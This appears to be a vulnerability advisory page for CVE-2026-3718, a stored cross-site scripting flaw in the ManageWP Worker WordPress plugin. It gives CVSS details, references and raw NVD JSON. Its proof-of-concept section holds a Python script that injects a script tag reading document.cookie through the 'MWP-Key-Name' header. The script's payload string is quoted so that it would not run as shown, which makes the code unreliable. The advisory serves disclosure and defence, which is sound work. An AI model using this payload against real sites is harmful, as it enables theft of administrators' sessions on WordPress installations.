CVE-2026-3718

Description

The ManageWP Worker plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'MWP-Key-Name' HTTP request header in all versions up to, and including, 4.9.31. This is due to insufficient input sanitization and output escaping of attacker-controlled header values. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever an administrator visits the plugin's connection management page with debug parameters.

CVSS Details

CVSS Score

7.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

ManageWP Worker Plugin <= 4.9.31

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL configuration
target_url = "http://example.com/wp-admin/admin-ajax.php"

# The vulnerable header 'MWP-Key-Name' containing the XSS payload
# This payload will be stored and executed when an admin views the debug page
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
    "MWP-Key-Name": ""><script>alert(document.cookie);</script>"
}

# Sending the payload
try:
    response = requests.get(target_url, headers=headers, timeout=5)
    if response.status_code == 200:
        print("[+] Payload sent successfully.")
        print("[+] Check if the script is stored in the database.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[-] An error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-3718
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-3718
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-3718/
[4] VulDB https://vuldb.com/cve/CVE-2026-3718
[5] https://plugins.trac.wordpress.org/changeset/3485733/worker
[6] https://www.wordfence.com/threat-intel/vulnerabilities/id/db6f08f9-4da3-450d-bf1e-5c9f0aab02a1?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-3718", "sourceIdentifier": "[email protected]", "published": "2026-05-14T07:16:19.703", "lastModified": "2026-05-14T14:28:41.283", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The ManageWP Worker plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'MWP-Key-Name' HTTP request header in all versions up to, and including, 4.9.31. This is due to insufficient input sanitization and output escaping of attacker-controlled header values. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever an administrator visits the plugin's connection management page with debug parameters."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3485733/worker", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/db6f08f9-4da3-450d-bf1e-5c9f0aab02a1?source=cve", "source": "[email protected]"}]}}